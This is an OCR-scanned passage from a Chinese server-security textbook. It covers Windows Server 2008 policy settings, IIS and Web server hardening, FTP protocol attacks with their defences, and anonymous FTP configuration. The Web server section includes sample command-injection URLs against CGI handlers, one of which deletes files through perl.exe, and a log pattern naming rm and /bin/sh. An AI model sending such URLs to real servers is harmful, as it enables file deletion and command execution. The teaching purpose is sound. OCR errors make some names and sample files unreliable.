其 次 单 击 mntemet 选项 设置 窗口 中 的 “连接 ”选项 卡 ， 进 入 连接 选项 设置 页 面 ， 单 击 该 
设置 页 面 中 的 “局 域 网 设置 ”按钮 ， 选 择 其 后 设置 页 面 中 的 “为 LAN 使 用 代理 服务 器 ” 选 
项 ， 再 任意 输入 一 个 代理 服务 器 的 主机 地 址 以 及 端口 号 码 ， 再 单 击 “ 确 定 ”按钮 执行 参数 
设置 保存 操作 。 

然后 注销 Windows Server 2008 系统 , 换 用 具有 特殊 权限 的 用 户 账号 重新 登录 Windows 
Server 2008 系统 ， 并 进入 对 应 系统 的 组 策略 控制 台 窗口 。 

选中 该 控制 台 窗 口 左 侧 位 置 处 的 “计算 机 配置 ”节点 选项 ， 再 从 目标 节点 下 面 依次 展 
开 “ 管 理 模板 ”一 “Windows 组 件 ” 一 Intemet Explorer 一 “Internet 控制 面板 ” 子 项 ， 如 
图 8-14 所 示 。 
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图 8-14 在 “本 地 组 策略 ”中 打开 Internet 控制 面板 


再 双击 打开 目标 子 项 下 面 的 “禁用 连接 页 ”组 策略 项 目 ， 此 时 系统 屏幕 上 会 弹出 如 
图 8-15 所 示 的 目标 组 策略 属性 设置 对 话 框 ， 选 中 “已 启用 ” 单 选 按钮 ， 单 击 “ 确 定 ”按钮 
执行 设置 保存 操作 。 
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图 8-15 “禁用 连接 页 ”对 话 框 


如 此 设置 后 ,普通 权限 的 用 户 日 后 在 Windows Server 2008 系统 中 尝试 访问 网 络 时 , 正 
浏览 器 会 自动 连接 一 个 失效 的 代理 服务 器 , 那么 正 浏览 器 自然 也 就 不 能 正常 显示 网 络 页 面 
内 容 了 ， 而 具有 特殊 权限 的 用 户 在 Windows Server 2008 系统 中 尝试 进行 网 络 访问 时 ， 正 
浏览 器 会 直接 显示 出 目标 站 点 的 内 容 ， 不 需要 通过 代理 服务 器 进行 中 转 。 

6) 加 强 系统 安全 提示 

为 了 防止 在 Windows Server 2008 服务 器 系统 中 不 小 心 进行 了 一 些 不 安全 操作 , 应 将 系 
统 自 带 的 UAC 功能 启用 , 并且 该 功能 还 能 有 效 防范 一 些 木 马 程序 自动 在 系统 后 台 进 行 安 装 
操作 。 

首先 以 系统 管理 员 身 份 进入 Windows Server 2008 系统 ,在 该 系统 桌面 中 依次 选择 “ 开 
始 ” 一 “运行 ”命令 ， 在 弹出 的 系统 运行 文本 框 中 ， 输 入 “msconfig” 字 符 串 命令 ， 单 击 
“确定 ”按钮 后 ， 进 入 对 应 系统 的 实用 程序 配置 界面 。 

其 次 在 实用 程序 配置 界面 中 单 击 “ 工 具 ” 标 签 ， 进 入 如 图 8-16 所 示 的 标签 设置 页 面 ， 
从 该 设置 页 面 的 工具 列表 中 找到 “更 改 UAC 设置 ”项 目 ， 再 单 击 “ 启 动 ” 按 钮 ， 最 后 单 击 
“确定 ”按钮 并 重新 启动 Windows Server 2008 系统 ， 以 后 在 Windows Server 2008 服务 器 
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系统 中 不 小 心 进行 一 些 不 安全 操作 时 ， 系 统 就 能 及 时 弹出 安全 提示 。 


7) 关闭 远程 连接 

黑客 有 时 候 会 通过 同时 建立 多 个 远程 连接 , 来 消耗 Windows Server 2008 服务 器 系统 的 
宝贵 资源 ， 最 终 达 到 搞 垮 服务 器 系统 的 目的 。 为 此 ， 在 实际 管理 Windows Server 2008 服务 
器 系统 的 过 程 中 ， 一 旦 我 们 发 现 服务 器 系统 运行 状态 突然 不 正常 时 ， 可 以 按照 下 面 的 办 法 
强行 断 开 所 有 与 Windows Server 2008 服务 器 系统 建立 连接 的 各 个 远程 连接 , 以 便 及 时 将 服 
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图 8-16 开启 “UAC” 


务 器 系统 的 工作 状态 恢复 正常 。 
首先 进入 目标 服务 器 系统 的 组 策略 控制 台 窗口 。 


然后 选中 “组 策略 控制 台 ” 窗 口 左 侧 位 置 处 的 “用 户 配 置 ” 节 点 分 支 ， 并 逐一 选择 目 
标 节点 分 支 下 面 的 “管理 模板 ”一 “网 络 ” 一 “网 络 连 接 ” 组 策略 选项 ， 之 后 双击 “网 络 
连接 ”分 支 下 面 的 “删除 所 有 用 户 远 程 访 问 连接 ”选项 , 如 图 8-17 所 示 , 在 弹出 的 如 图 8-18 
所 示 的 选项 设置 对 话 框 中 ， 选 中 “已 启用 ” 单 选 按钮 ， 再 单 击 “ 确 定 ” 按 钮 保存 好 上 述 设 
置 , 这样 Windows Server 2008 服务 器 系统 中 的 各 个 远程 连接 都 会 被 自动 断 开 ， 此 时 对 应 系 


统 的 工作 状态 就 会 立即 恢复 正常 。 
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8-17 ”删除 所 有 用 户 远程 访问 连接 
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图 8-18 “删除 所 有 用 户 远 程 访问 连接 ”设置 面板 
8.2.2 保证 1IS 自身 的 安全 性 


1) IIS 安全 安装 
要 构建 一 个 安全 的 IS 服务 器 ， 必 须 从 安装 时 就 充分 考虑 安全 问题 。 
(1) 不 要 将 IS 安装 在 系统 分 区 上 。 
(2) 修改 IIS 的 安装 默认 路 径 。 
(3) 打上 Windows 和 IIS 的 最 新 补丁 。 
2) IIS 的 安全 配置 有 以 下 几 个 步骤 。 
(1) 删除 不 必要 的 虚拟 目录 。 
IIS 安装 完成 后 在 wwwroot 下 默认 生成 了 一 些 目录 ， 包 括 ISHelp、ISAdmin、 
IISSamples、MSADC 等 ， 这 些 目录 都 没有 什么 实际 的 作用 ， 可 直接 删除 。 
(2) 删除 危险 的 IS 组 件 。 
默认 安装 后 的 有 些 IS 组 件 可 能 会 造成 安全 威胁 ， 例 如 Intemet 服务 管理 器 (HTML)、 
SMTP Service 和 NNTP Service、 样本 页 面 和 脚本 , 大 家 可 以 根据 自己 的 需要 决定 是 否 删除 。 
(3) 为 IIS 中 的 文件 分 类 设置 权限 。 
除了 在 操作 系统 里 为 IS 的 文件 设置 必要 的 权限 外 , 还 要 在 IS 管理 器 中 为 它们 设置 权 
限 ， 以 期 做 到 双 保 险 。 一 般 而 言 ， 对 一 个 文件 夹 永远 也 不 应 同时 设置 写 和 执行 权限 ， 以 防 
止 攻击 者 向 站 点 上 传 并 执行 恶意 代码 。 另 外 目录 浏览 功能 也 应 禁止 ， 预 防 攻击 者 浏览 整个 
站 点 上 的 文件 夹 并 找到 漏洞 。 一 个 好 的 设置 策略 是 , 为 Web 站 点 上 不 同类 型 的 文件 都 建立 
目录 ， 然 后 给 它们 分 配 适当 权限 。 例 如 : 
e@ ”静态 文件 文件 夹 : 包括 所 有 静态 文件 ， 如 HTM 或 HTML， 给 予 允 许 读 取 、 拒 绝 
写 的 权限 。 

@ ”ASP 脚本 文件 夹 : 包含 站 点 的 所 有 脚本 文件 ， 如 CGI、vbs、asp 等 ， 给 予 允许 执 
行 、 拒 绝 写 和 读 取 的 权限 。 

@ ”EXE 等 可 执行 程序 : 包含 站 点 上 的 二 进 制 执行 文件 ， 给 予 允许 执行 、 拒 绝 写 和 拒 
绝 读 取 的 权限 。 

(4) 删除 不 必要 的 应 用 程序 映射 。 

IIS 中 默认 存在 很 多 种 应 用 程序 映射 ， 如 : htw、.ida、.idq、.asp、.cer、.cdx、.asa、 
.htr、.idc、.shtm、.shtml、.stm、.printer 等 ， 通 过 这 些 程序 映射 ，IIS 就 能 知道 对 于 什么 样 
的 文件 该 调用 什么 样 的 动态 链接 库 文件 来 进行 解析 处 理 。 但是， 在 这 些 程序 映射 中 ， 除 
了 .asp 的 这 个 程序 映射 ， 其 他 的 文件 在 网 站 上 都 很 少 用 到 。 而 且 在 这 些 程序 映射 中 ，htr、.idq、 
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.ida、.printer、.cer、.cdx 等 多 个 程序 映射 都 已 经 被 发 现存 在 缓存 溢出 问题 ， 入 侵 者 可 以 利 
用 这 些 程 序 映 射 中 存在 的 缓存 溢出 获得 系统 的 权限 .即使 已 经 安装 了 系统 最 新 的 补丁 程序 ， 
仍然 无 法 保证 安全 。 

(5) 保护 日 志 安 全 。 

志 是 系统 安全 策略 的 一 个 重要 环节 ， 确 保 日 志 的 安全 能 有 效 提高 系统 整体 安全 性 。 

@ 修改 IIS 日 志 的 存放 路 径 。 

@ 修改 日 志 访 问 权 限 。 

将 访问 权限 设置 为 只 有 管理 员 才能 访问 。 

通过 以 上 的 一 些 安全 设置 ，Web 服务 器 会 安全 许多 。 


8.2.3 ”提高 系统 安全 性 和 稳定 性 


Web 服务 器 安全 预防 措施 。 

(1) 限制 在 Web 服务 器 开 账户 ， 定 期 删除 一 些 中 断 进程 的 用 户 。 

(2) 对 在 Web 服务 器 上 开 的 账户 , 在 口令 长 度 及 定期 更 改 方面 作出 要 求 , 防止 被 盗用 。 

(3) 尽量 使 tp、mail 等 服务 器 与 之 分 开 ， 去 掉 ftp、sendmail、 tftp、NIS、NFS、finger、 
netstat 等 一 些 无 关 的 应 用 。 

(4) 在 Web 服务 器 上 去 掉 一 些 绝对 不 用 的 shell 等 解释 器 ， 即 当 在 你 的 CGI 的 程序 中 
没 用 到 perl 时 ， 就 尽量 把 perl 在 系统 解释 器 中 删除 掉 。 

(5) 定期 查看 服务 器 中 的 日 志 logs 文件 ， 分 析 一 切 可 疑 事件 。 在 errorlog 中 出 现 rm、 
login、/bin/perl、/bin/sh 等 之 类 记录 时 ， 你 的 服务 器 可 能 有 受到 一 些 非法 用 户 的 入 侵 的 

(6) 设置 好 Web 服务 器 上 系统 文件 的 权限 和 属性 , 对 可 让 人 访问 的 文档 分 配 一 个 公用 
的 组 如 : www， 并 只 设置 为 只 读 的 属性 。 把 所 有 的 HTML 文件 归属 WWW 组 ， 由 Web 管 
理 员 管理 WWW 组 。 对 于 Web 的 配置 文件 仅 对 Web 管理 员 有 写 的 权利 。 

(7) 有 些 Web 服务 器 把 Web 的 文档 目录 与 FTP 目录 指 在 同一 目录 时 ， 应 该 注意 不 要 
把 FTP 的 目录 与 CGI-BIN 指定 在 一 个 目录 之 下 。 这 样 是 为 了 防止 一 些 用 户 通过 FTP 上 的 
一 些 犹如 PERL 或 SH 之 类 程序 用 Web 的 CGI-BIN 去 执行 造成 不 良 后 果 。 

(8) 通过 限制 许可 访问 用 户 卫 或 DNS， 如 : 


在 NCSA 中 的 access.conf 中 加 上 : 
<Directory /full/path/to/directory >; 
<Limit GET POST >; 
order mutual-failure 
deny from all 
allow from 168.160.142. abc.net.cn 
</Limit >; 


</Directory >; 


这 样 只 能 是 以 域名 为 abc.net.cn 或 卫 属于 168.160.142 的 客户 访问 该 Web 服务 器 。 对 
于 CERN 或 W3C 服务 器 可 以 这 样 在 httpd.conf 中 加 上 。 
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Protection LOCAL-USERS { 

GetMask @(*.capricorn.com, *.zo0.0rg, 18.157.0.5) 
} 

Protect /relative/path/to/directory/* LOCAL-USERS 


(9) WINDOWS 下 HITPD。 


@ Perl 解释 器 的 漏洞 。 
Netscape Communications Server 中 无 法 识别 cgi-bin 下 的 扩展 名 及 其 应 用 关系 ， 如 : .pl 


是 PERL 的 代码 程序 自动 调用 perl.exe 文件 解释 ， 即 使 现在 也 只 能 把 perl.exe 文件 存放 在 
cgi-bin 目录 之 下 。 执行 如 : /cgi-bin/perl.exe?&my_script.pl. 但 是 这 就 给 任何 人 都 有 执行 perl 
的 可 能 , 当 有 些 人 在 其 浏览 器 的 URL 中 加 上 如 : /cgi-bin/perl.exe?&-etunlink+%3C*%3E 时 ， 
有 可 能 造成 删除 服务 器 当前 目录 下 文件 的 危险 。 但 是 , 其 他 如 : O'Reilly WebSite 或 Purveyor 
都 不 存在 这 种 漏洞 。 


新 。 


@ CGI 执行 批 处 理 文件 的 漏洞 。 
文件 名 : test.bat: 


echo off 
echo Content-type: text/plain 
echo 


echo Hello World! 


如 果 客 户 浏 览 器 的 URL 为 : /cgi-bin/test.bat?&dir。 则 执行 调用 命令 解释 器 完成 dir 列 


。 这 给 访问 者 有 执行 其 他 命令 的 可 能 性 。 


另外 ,许多 Web 服务 器 本 身 都 存在 一 些 安全 上 的 漏洞 ， 需 要 在 版 本 升级 过 程 中 不 断 更 
在 此 就 不 一 一 列举 了 。 


8.3 FTP 服务 器 的 安全 架设 


文件 传输 协议 (File Transfer Protocol，FTP) 是 一 个 被 广泛 应 用 的 协议 ， 它 使 得 我 们 能 够 


在 网 络 上 方便 地 传输 文件 。 早 期 FTP 并 没有 涉及 安全 问题 ， 随 着 互联 网 应 用 的 快速 增长 ， 
人 们 对 安全 的 要 求 也 不 断 提 高 。 本文 在 介绍 了 FTP 协议 的 基本 特征 后 ,从 两 个 方面 探讨 了 FTP 
安全 问题 的 解决 方案 。 协 议 在 安全 功能 方面 扩展 ， 协 议 自身 的 安全 问题 以 及 用 户 如 何 防范 。 


8.3.1 FTP 的 特性 


议 。 


早期 对 FTP 的 定义 指出 , FTP 是 一 个 ARPA 计算 机 网 络 上 主机 间 文 件 传输 的 用 户 级 协 
其 主要 功能 是 方便 主机 间 的 文件 传输 ， 并 且 人 允许 在 其 他 主机 上 进行 方便 的 存储 和 文件 


处 理 。 而 现在 FTP 的 应 用 范围 则 是 Intemet。 


根据 FTP STD 9 定义 ，FTP 的 目标 包括 以 下 几 项 。 
(1) 促进 文件 (程序 或 数据 ) 的 共享 。 
(2) 支持 间接 或 隐 式 地 使 用 远程 计算 机 。 
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(3) 使 存储 介质 对 用 户 透明 。 

(4) 可 靠 并 有 效 地 传输 数据 。 

关于 FTP 的 一 些 其 他 性 质 包 括 : FTP 可 以 被 用 户 在 终端 使 用 , 但 通常 是 给 程序 使 用 的 。 
FTP 中 主要 采用 了 传输 控制 协议 (Transmission Control Protocol，TCP) 和 Telnet 协议 。 因 此 
要 重视 协议 的 安全 问题 及 防范 措施 ， 下 面 介绍 几 种 存在 的 安全 问题 以 及 防范 措施 。 

1. 防范 反弹 攻击 (The Bounce Attack) 

1) “漏洞 

FTP 规范 定义 了 “代理 FTP” 机 制 ， 即 服务 器 间 交 互 模型 。 支 持 客户 建立 一 个 FTP 控 
制 连接 , 然后 在 两 个 服务 间 传 送 文件 。 同 时 FTP 规范 中 对 使 用 TCP 的 端口 号 没有 任何 限制 ， 
而 从 0 一 1023 的 TCP 端口 号 保留 用 于 众所周知 的 网 络 服务 。 所 以 ， 通 过 “代理 FTP”， 客 
户 可 以 命令 FTP 服务 器 攻击 任何 一 台 机 器 上 众所周知 的 服务 。 

2) ”反弹 攻击 

客户 发 送 一 个 包含 被 攻击 的 机 器 和 服务 的 网 络 地 址 和 端口 号 的 FTP“PORT” 命 令 。 这 
时 客户 要 求 FTP 服务 器 向 被 攻击 的 服务 发 送 一 个 文件 ， 这 个 文件 中 应 包含 与 被 攻击 的 服务 
相关 的 命令 (例如 : SMTP、NNTP)。 由 于 是 命令 第 三 方 去 连接 服务 ， 而 不 是 直接 连接 ， 这 
样 不 仅 使 追踪 攻击 者 变 得 困难 ， 还 能 避 开 基于 网 络 地 址 的 访问 限制 。 

3) ”防范 措施 

最 简单 的 办 法 就 是 封 住 漏洞 。 首 先 ， 服 务 器 最 好 不 要 建立 TCP 端口 号 在 1024 以 下 的 
连接 。 如 果 服 务 器 收 到 一 个 包含 TCP 端口 号 在 1024 以 下 的 PORT 命令 ， 服 务 器 可 以 返回 
消息 504( 定 义 为 “对 这 种 参数 命令 不 能 实现 ”)。 

其 次 ， 禁 止 使 用 PORT 命令 也 是 一 个 可 选 的 防范 反弹 攻击 的 方案 。 大 多 数 的 文件 传输 
只 需要 PASV 命令 。 这 样 做 的 缺点 是 失去 了 使 用 “代理 FTP” 的 可 能 性 ， 但 是 在 某 些 环境 
中 并 不 需要 “代理 FTP”。 

4) 遗留 问题 

光 控 制 1024 以 下 的 连接 ， 仍 会 使 用 户 定义 的 服务 (TCP 端口 号 在 1024 以 上 ) 遭 受 反弹 
攻击 。 

2. 有 限制 的 访问 (Restricted Access) 


1) ”需求 

对 一 些 FTP 服务 器 来 说 ， 基 于 网 络 地 址 的 访问 控制 是 非常 渴望 的 。 例 如 ， 服 务 器 可 能 
希望 限制 来 自 某 些 地 点 的 、 对 某 些 文件 的 访问 (例如 为 了 某 些 文件 不 被 传送 到 组 织 以 外 )。 
另外 ， 客 户 也 需要 知道 连接 是 有 所 期 望 的 服务 器 建立 的 。 

2) ”攻击 

攻击 者 可 以 利用 这 样 的 情况 ， 控 制 连接 是 在 可 信任 的 主机 之 上 ， 而 数据 连接 却 不 是 。 

3) ”防范 措施 

在 建立 连接 前 ， 双 方 需要 同时 认证 远 端 主机 的 控制 连接 ， 数 据 连接 的 网 络 地 址 是 否 可 
信 ( 如 在 组 织 之 内 )。 

人 ”遗留 问题 

基于 网 络 地 址 的 访问 控制 可 以 起 一 定 作用 ， 但 还 可 能 受到 “地 址 盗用 (spooD ”攻击 。 
在 spoof 攻击 中 ， 攻 击 机 器 可 以 冒 用 在 组 织 内 的 机 器 的 网 络 地 址 ， 从 而 将 文件 下 载 到 在 组 
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织 之 外 的 未 授权 的 机 器 上 。 

3. 保护 密码 (Protecting Passwords) 

1) ”漏洞 

(1) 在 FTP 标准 [PR85] 中 ，FTP 服务 器 允许 无 限 次 输入 密码 。 

(2) “PASS” 命 令 以 明文 传送 密码 。 

2) 攻击 

强力 攻击 有 两 种 表现 : 在 同一 连接 上 直接 强力 攻击 ; 和 服务 器 建立 多 个 并 行 的 连接 进 
行 强力 攻击 。 

3) ”防范 措施 

对 第 一 种 强力 攻击 ， 建 议 服务 器 尝试 限制 输入 正确 口令 的 次 数 。 在 几 次 尝试 失败 后 ， 
服务 器 应 关闭 和 客户 的 控制 连接 。 在 关闭 之 前 ， 服 务 器 可 以 发 送 返 回 码 421( 服 务 不 可 用 ， 
关闭 控制 连接 )。 另 外 ， 服 务 器 在 相应 无 效 的 “PASS” 命 令 之 前 应 暂停 几 秒 来 消减 强力 攻 
击 的 有 效 性 。 若 可 能 的 话 ， 目 标 操作 系统 提供 的 机 制 可 以 用 来 完成 上 述 建议 。 

对 第 二 种 强力 攻击 ,服务 器 可 以 限制 控制 连接 的 最 大 数目 , 或 探查 会 话 中 的 可 疑 行为 ， 
并 在 以 后 拒绝 该 站 点 的 连接 请 求 。 

密码 的 明文 传播 问题 可 以 用 FTP 扩展 中 防止 窃听 的 认证 机 制 解决 。 

人” 遗留 问题 

然而 上 述 两 种 措施 的 引入 又 都 会 被 “业务 否决 ”攻击 ， 攻 击 者 可 以 故意 的 禁止 有 效用 
户 的 访问 。 

4. 私密 性 (Privacy) 


在 FTP 标准 中 [PR85] 中 ， 所 有 在 网 络 上 被 传送 的 数据 和 控制 信息 都 未 被 加 密 。 为 了 保 
障 FTP 传输 数据 的 私密 性 ， 应 尽 可 能 使 用 强壮 的 加 密 系统 。 

5. 保护 用 户 名 (Usernames) 

1) 漏洞 

当 “USER ”命令 中 的 用 户 名 被 拒绝 时 , 在 FTP 标准 中 [PR85] 定 义 了 相应 的 返回 码 530。 
而 当 用 户 名 是 有 效 的 但 却 需要 密码 ，FTP 将 使 用 返回 码 331。 

2) 攻击 

攻击 者 可 以 通过 利用 USER 操作 返回 的 码 ， 确 定 一 个 用 户 名 是 否 有 效 。 

3) ”防范 措施 

不 管 如 何 ， 两 种 情况 都 返回 331。 

6. 端口 盗用 (Port Stealing) 

1) “漏洞 

当 使 用 操作 系统 相关 的 方法 分 配 端 口号 时 ， 通 常 都 是 按 增 序 分 配 。 

2) 攻击 

攻击 者 可 以 通过 规律 ， 根 据 当前 端口 分 配 情况 ， 确 定 要 分 配 的 端口 。 他 就 能 做 和 
预先 占领 端口 ， 让 合法 用 户 无 法 分 配 ; 窃听 信息 ; 伪造 信息 。 

3) ”防范 措施 

由 与 操作 系统 无 关 的 方法 随机 分 配 端口 号 ， 让 攻击 者 无 法 预测 。 


mi 
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7. 结论 


FTP 被 我 们 广泛 应 用 ， 自 建立 后 其 主 框架 相当 稳定 ， 二 十 多 年 没有 什么 变化 ， 但 是 在 
Internet 迅猛 发 展 的 形势 下 ， 其 安全 问题 还 是 日 益 突出 出 来 。 上 述 的 安全 功能 扩展 和 对 协议 
中 安全 问题 的 防范 ， 也 正 是 近年 来 人 们 不 懈 努 力 的 结果 ， 而 且 在 一 定 程度 上 缓解 了 FTP 的 
安全 问题 。 


8.3.2 匿名 FTP 的 安全 设 定 


在 网 络 上 ， 匿 名 FTP 是 一 个 很 常用 的 服务 ， 常 用 于 软件 下 载 网 站 、 软 件 交 流 网 站 等 ， 
为 了 提高 匿名 FTP 服务 开放 过 程 中 的 安全 性 ， 我 们 就 这 一 问题 进行 一 些 讨论 。 

以 下 的 设 定 方式 是 由 过 去 许多 网 站 累积 的 经 验 与 建议 组 成 。 我 们 认为 可 以 让 有 个 别 需 
求 的 网 站 拥有 不 同 设 定 的 选择 。 

1) FTP daemon 

网 站 必须 确定 目前 使 用 的 是 最 新 版 本 的 FTP daemon。 

2)” 设 定 匿 名 FTP 的 目录 

匿名 ftp 的 根 目 录 (~ftp) 和 其 子 目录 的 拥有 者 不 能 为 ftp 账号 ,或 与 fp 相同 群 组 的 账号 ， 
这 是 一 般 常见 的 设 定 问题 。 假 如 这 些 目录 被 fp 或 与 fp 相同 群 组 的 账号 所 拥有 ， 又 没有 做 
好 防止 写 入 的 保护 ， 入 侵 者 便 可 能 在 其 中 增加 文件 (例如 : .rhosts 档 ) 或 修改 其 他 文件 。 许 多 
网 站 允许 使 用 root 账号 。 让 匿名 FTP 的 根 目录 与 子 目录 的 拥有 者 是 root， 所 属 族 群 (group) 
为 system， 并 限定 存 取 权 (如 : chmod 0755)， 如 此 只 有 root 有 写 入 的 权力 ， 这 能 帮助 你 维 
持 FTP 服务 的 安全 。 

以 下 是 一 个 匿名 ftp 目录 的 设 定 范例 : 


drwxr-xr-x 7 root system 512 Mar 1 15: 17 ./ 

drwxr-xr-x 25 root system 512 Jan 4 11: 30 ../ 
drwxr-xr-x 2 root system 512 Dec 20 15: 43 bin/ 
drwxr-xr-x 2 root system 512 Mar 12 16: 23 etc/ 
drwxr-xr-x 10 root system 512 Jun 5 10: 54 pub/ 


所 有 的 文件 和 链接 库 , 特别 是 那些 被 FTP daemon 使 用 和 那些 在 ~ftp/bin 与 ~ftp/ete 中 
的 文件 ， 应 该 像 上 面 范例 中 的 目录 那样 做 相同 的 保护 。 这 些 文件 和 链接 库 除了 不 应 该 被 地 
账号 或 与 fp 相同 群 组 的 账号 所 拥有 之 外 ， 也 必须 防止 写 入 。 

3) “使 用 合适 的 密码 与 群 组 文件 

我 们 强烈 建议 网 站 不 要 使 用 系统 中 的 /etc/passwd 作为 ~ftp/etc 目录 中 的 密码 文件 , 或 将 
系统 中 /etc/group 作为 ~ftp/ete 目录 中 的 群 组 文件 。 在 ~ftp/etc 目录 中 放置 这 些 文件 会 使 得 
入 侵 者 取得 它们 。 这 些 文件 是 可 自 定 的 而 且 不 是 用 来 做 存 取 控 制 。 

我 们 建议 你 在 ~ftp/etc/passwd 与 ~ftp/etc/group 中 使 用 代替 的 文件 。 这 些 文件 必须 由 root 
所 拥有 。DIR 命令 会 使 用 这 代替 的 文件 来 显示 文件 及 目录 的 拥有 者 和 群 组 名 称 。 网 站 必须 
确定 ~/ftp/etc/passwd 中 没有 包含 任何 与 系统 中 /etc/passwd 文件 中 相同 的 账号 名 称 。 这 些 
文件 应 该 仅仅 包含 需要 显示 的 FTP 阶层 架构 中 文件 与 目录 的 拥有 者 与 所 属 群 组 名 称 。 此 外 ， 
确定 密码 字段 是 “整理 ”过 的 。 例 如 使 用 「*」 来 取代 密码 字段 。 

以 下 为 cert 中 匿名 fp 的 密码 文件 范例 : 
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ssphwg: *: 3144: 20: Site Specific Policy Handbook Working Group: : 
Cops: *: 3271: 20: COPS Distribution: : 

Ce xs 9920; 20: CERT: 3 

tools: *: 9921: 20: CERT TOO]lSs: : 

ftp: *: 9922; 90; Anonymous FTP: : 

nist; *; 9923; 90: NIST Files: : 

以 下 为 cert 中 匿名 ftp 的 群 组 文件 范例 

cert: *: 20: 

EDxisE905 


在 你 的 匿名 fp， 提 供 可 写 入 的 目录 。 

让 一 个 匿名 fp 服务 允许 使 用 者 储存 文件 是 有 风险 存在 的 。 我 们 强烈 建议 网 站 不 要 自动 
建立 一 个 上 传 目 录 ， 除 非 已 考虑 过 相关 的 风险 。 美 国 计 算 机 紧急 事件 响应 小 组 协调 中 心 
(Computer Emergency Response Team/Coordination Center，CERT/CC) 的 事件 回报 人 员 截 获 
许多 使 用 上 传 目录 造成 非法 传输 版 权 软件 或 交换 账号 与 密码 信息 的 事件 。 也 曾 阻 止 将 系统 
文件 灌 报 造成 denialof service 问题 的 恶意 攻击 。 

本 节 在 讨论 利用 三 种 方法 解决 这 个 问题 : 第 一 种 方法 是 使 用 一 个 修正 过 的 FTP 
daemon; 第 二 个 方法 是 提供 对 特定 目录 的 写 入 限制 ， 第 三 种 方法 是 使 用 独立 的 目录 。 

1. 修正 过 的 FTP daemon 


假如 你 的 网 站 计划 提供 目录 用 来 做 文件 上 传 ,我 们 建议 使 用 修正 过 的 FTP daemon 对 文 
件 上 传 的 目录 做 存 取 的 控制 。 这 是 避免 使 用 不 需要 的 写 入 区 域 的 最 好 方法 。 以 下 有 一 些 
建议 。 

(1) 限定 上 传 的 文件 无 法 再 被 存 取 ， 如 此 可 由 系统 管理 者 检测 后 ， 再 放置 于 适当 位 置 
供 人 下 载 。 

(2) 限制 每 个 联机 的 上 传 资料 大 小 。 

(3) 依照 现 有 的 磁盘 大 小 限制 数据 传输 的 总 量 。 

(4) 增加 登录 记录 以 提前 发 现 不 当 的 使 用 。 

若 你 欲 修改 FTP daemon， 你 应 该 可 以 从 厂商 那里 拿 到 程序 代码 , 或 者 你 可 从 下 列 地 方 
取得 公开 的 FTP 程序 原始 码 : 


wuarchive.wustl.edu ~ftp/packages/wuarchive-ftpd 


ftp.uu.net ~ftp/systems/unix/bsd-sources/libexec/ftpd 
gatekeeper.dec.com ~ftp/pub/DEC/gwtools/ftpd.tar.z 


CERT/CC 并 没有 正式 地 对 所 提 到 的 FTP daemon 做 检测 、 评 估 或 背书 .要 使 用 何 种 FTP 
daemon 由 每 个 使 用 者 或 组 织 负责 决定 ， 而 CERT/CC 建议 每 个 机 关 在 安装 使 用 这 些 程序 之 
前 ， 能 做 一 个 彻底 的 评估 。 

2. 使 用 保护 的 目录 

假如 你 想 要 在 你 的 FTP 站 提供 上 传 的 服务 ， 而 你 又 没 办 法 去 修改 FTP daemon， 我 们 
就 可 以 使 用 较 复 杂 的 目录 架构 来 控制 存 取 。 这 个 方法 需要 事先 规划 ， 并 且 无 法 百分之百 防 
止 FTP 可 写 入 区 域 遭 不 当 使 用 ， 不 过 许多 FTP 站 仍 使 用 此 方法 。 

为 了 保护 上 层 的 目录 (~ftp/incoming)， 我 们 只 给 匿名 的 使 用 者 进入 目录 的 权限 (chmod 
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751 ~ftp/incoming)。 这 个 动作 将 使 得 使 用 者 能 够 更 改 目录 位 置 (cd), 但 不 允许 使 用 者 监视 目 
录 内 容 。Ex: 


drwxr-x--x 4 root system 512 Jun 11 13: 29 incoming/ 


在 ~ftp/incoming 使 用 一 些 目录 名 ， 只 让 你 允许 他 们 上 传 的 人 知道 。 为 了 让 别人 不 易 猜 
到 目录 名 称 ， 我 们 可 以 用 设 定 密码 的 规则 来 设 定 目录 名 称 。 请 不 要 使 用 本 文 的 目录 名 称 范 
例 ( 避 免 被 别有用心 人 士 发 现 你 的 目录 名 ， 并 上 传 文件 )。 


drwxr-x-wx 10 root system 512 Jun 11 13: 54 jAjwUth2/ 
drwxr-x-wx 10 root system 512 Jun 11 13: 54 MhaLL-iF/ 


这 里 很 重要 的 一 点 是 ， 一 旦 目录 名 被 有 意 无 意 地 泄露 出 来 ， 那 这 个 方法 就 没什么 保护 
作用 。 只 要 目录 名 称 被 大 部 分 人 知道 ， 就 无 法 保护 那些 要 限定 使 用 的 区 域 了 。 假 如 目录 名 
被 大 家 所 知道 ， 那 你 就 得 选择 删除 或 更 改 那些 目录 名 。 


3. 只 使 用 一 块 硬盘 


假如 你 想 要 在 你 的 FTP 站 提供 上 传 的 服务 , 而 你 又 没 办 法 去 修改 FTP daemon, 那么 你 
可 以 将 所 有 上 传 的 资料 集中 在 同一 个 挂 (moun0) 在 ~ftp/incoming 上 的 文件 系统 。 可 以 的 话 ， 
将 一 颗 单 独 的 硬盘 挂 (mount) 在 ~ftp/incoming 上 。 系 统管 理 者 应 持续 监视 这 个 目录 
(~ftp/incoming)， 如 此 便 可 知道 开放 上 传 的 目录 是 否 有 问题 。 

匿名 FTP 可 以 很 好 地 限制 用 户 只 能 在 规定 的 目录 范围 内 活动 , 但 正式 的 FTP 用 户 默认 
不 会 受到 这 种 限制 。 这 样 ， 就 可 以 自由 在 根 目录 、 系 统 目 录 、 其 他 用 户 的 目录 中 读 取 一 些 
允许 其 他 用 户 读 取 的 文件 。 

如 何 才 能 把 指定 的 用 户 像 匿 名 用 户 一 样 限制 在 他 们 自己 的 目录 中 呢 ?” 以 下 我 们 以 red 
hat 和 wu-ftp 为 例 做 一 下 介绍 。 

(1) 创建 一 个 组 ， 用 groupadd 命令 ， 一 般 可 以 就 用 fp 组 ， 或 者 任何 组 名 。 

本 相关 命令 : groupadd ftpuser 

Pe 相关 文件 /etc/group 

se 相关 帮助 : man groupadd 

(2) 创建 一 个 用 户 ， 如 testuser， 建 立 用 户 可 用 adduser 命令 。 如 果 你 已 在 先前 建立 了 
testuser 这 个 用 户 ， 可 以 直接 编辑 /etc/passwd 文件 ， 把 这 个 用 户 加 入 到 ftpuser 这 个 组 中 。 

TCR 相关 命令 : adduser testuser -g ftpuser 


ee 相关 文件 : /etc/passwd 
re 相关 帮助 : man adduser 


(3) ”修改 /etc/ftpaccess 文件 , 加 入 guestgroup 的 定义 : guestgroup ftpuser， 加 的 是 最 后 5 行 。 


compress yes all 

tar yes all 

chmod no anonymous 
delete no anonymous 
overwrite no anonymous 
rename no anonymous 
chmod yes guest 
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delete Yes guest 
